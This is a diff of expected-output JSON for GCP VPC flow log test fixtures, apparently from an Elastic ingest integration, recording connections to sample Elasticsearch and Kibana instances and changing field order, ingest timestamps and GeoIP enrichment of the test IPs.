@@ -11660,43 +12229,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65262, - "bytes": 4900, - "ip": "67.43.156.13", - "packets": 542 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", - "bytes": 4900, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 542, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -11707,6 +12239,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -11724,8 +12259,33 @@ "reporter": "DEST" } }, + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65262, + "bytes": 4900, + "ip": "67.43.156.13", + "packets": 542 + }, "event": { - "ingested": "2021-12-09T13:37:46.391796700Z", + "ingested": "2021-12-14T14:43:27.415234413Z", "original": "{\"insertId\":\"ptjoddfhmrhgm\",\"jsonPayload\":{\"bytes_sent\":\"4900\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65262},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"542\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.251430011Z", 
@@ -11733,44 +12293,21 @@ "id": "ptjoddfhmrhgm", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 52328, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1781, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:zciDpB3TX5D1bnYbRXdjbgQDN+Q=", - "bytes": 1781, + "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", + "bytes": 4900, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, + "packets": 542, + "direction": "inbound" + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -11781,6 +12318,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -11801,8 +12341,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 52328, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1781, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391802200Z", + "ingested": "2021-12-14T14:43:27.415234805Z", "original": "{\"insertId\":\"ptjoddfhmrhgd\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":52328,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:42:20.842840991Z", 
@@ -11810,6 +12375,18 @@ "id": "ptjoddfhmrhgd", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:zciDpB3TX5D1bnYbRXdjbgQDN+Q=", + "bytes": 1781, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -11824,11 +12401,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33552, 
@@ -11900,7 +12482,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391807700Z", + "ingested": "2021-12-14T14:43:27.415235196Z", "original": "{\"insertId\":\"ptjoddfhmrhgl\",\"jsonPayload\":{\"bytes_sent\":\"63280\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075957044Z", 
@@ -11911,43 +12493,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "Europe", - "country_name": "rou", - "city_name": "Bucharest", - "region_name": "Bucharest" - }, - "as": { - "number": 24940 - }, - "address": "67.43.156.14", - "port": 37292, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 774029, - "packets": 403, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", - "bytes": 774029, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 403, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -11958,6 +12503,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -11978,8 +12526,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 37292, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 774029, + "packets": 403, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.391812600Z", + "ingested": "2021-12-14T14:43:27.415235651Z", "original": "{\"insertId\":\"ptjoddfhmrhgi\",\"jsonPayload\":{\"bytes_sent\":\"774029\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":37292,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"403\",\"reporter\":\"SRC\",\"rtt_msec\":\"102\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:35.048156283Z", 
@@ -11987,6 +12560,18 @@ "id": "ptjoddfhmrhgi", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", + "bytes": 774029, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 403, + "direction": "outbound" } }, { @@ -12001,11 +12586,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -12074,7 +12664,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391817Z", + "ingested": "2021-12-14T14:43:27.415236038Z", "original": "{\"insertId\":\"ptjoddfhmrhgo\",\"jsonPayload\":{\"bytes_sent\":\"359272\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466706102Z", 
@@ -12085,43 +12675,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "Europe", - "country_name": "rou", - "city_name": "Bucharest", - "region_name": "Bucharest" - }, - "as": { - "number": 24940 - }, - "address": "67.43.156.14", - "port": 37292, - "bytes": 310476, - "ip": "67.43.156.14", - "packets": 214 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", - "bytes": 310476, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 214, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -12132,6 +12685,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -12152,8 +12708,33 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 37292, + "bytes": 310476, + "ip": "67.43.156.14", + "packets": 214 + }, "event": { - "ingested": "2021-12-09T13:37:46.391822500Z", + "ingested": "2021-12-14T14:43:27.415236443Z", "original": "{\"insertId\":\"ptjoddfhmrhgp\",\"jsonPayload\":{\"bytes_sent\":\"310476\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":37292},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"214\",\"reporter\":\"DEST\",\"rtt_msec\":\"102\",\"src_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:35.048156283Z", 
@@ -12161,44 +12742,21 @@ "id": "ptjoddfhmrhgp", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 59790, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1784, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:tW5o1L9SEuS4pptFcAjo5fF6q5w=", - "bytes": 1784, + "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", + "bytes": 310476, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, + "packets": 214, + "direction": "inbound" + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -12209,6 +12767,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -12229,8 +12790,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 59790, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1784, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391826900Z", + "ingested": "2021-12-14T14:43:27.415236944Z", "original": "{\"insertId\":\"ptjoddfhmrhg8\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":59790,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:50.590894439Z", 
@@ -12238,6 +12824,18 @@ "id": "ptjoddfhmrhg8", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:tW5o1L9SEuS4pptFcAjo5fF6q5w=", + "bytes": 1784, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -12246,11 +12844,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33552, 
@@ -12328,7 +12931,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391830200Z", + "ingested": "2021-12-14T14:43:27.415237427Z", "original": "{\"insertId\":\"ptjoddfhmrhgf\",\"jsonPayload\":{\"bytes_sent\":\"209716\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"262\",\"reporter\":\"SRC\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075957044Z", @@ -12344,11 +12947,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33556, 
@@ -12426,7 +13034,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391834400Z", + "ingested": "2021-12-14T14:43:27.415237931Z", "original": "{\"insertId\":\"ptjoddfhmrhgg\",\"jsonPayload\":{\"bytes_sent\":\"165643\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"256\",\"reporter\":\"SRC\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:03.062674441Z", 
@@ -12437,18 +13045,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:15.857Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.139.99.242", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 220 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65257, 
@@ -12462,6 +13103,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415238315Z", + "original": "{\"insertId\":\"ptjoddfhmrhgb\",\"jsonPayload\":{\"bytes_sent\":\"65890\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65257,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"593\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.403388091Z", + "end": "2019-06-14T03:49:56.220614265Z", + "id": "ptjoddfhmrhgb", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -12473,51 +13124,11 @@ "iana_number": "6", "packets": 593, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:15.857Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 220 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391839400Z", - "original": "{\"insertId\":\"ptjoddfhmrhgb\",\"jsonPayload\":{\"bytes_sent\":\"65890\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65257,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"593\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.403388091Z", - "end": "2019-06-14T03:49:56.220614265Z", - "id": "ptjoddfhmrhgb", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": 
"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + } + }, + { + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, "destination": { "address": "10.139.99.242", @@ -12527,11 +13138,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33538, 
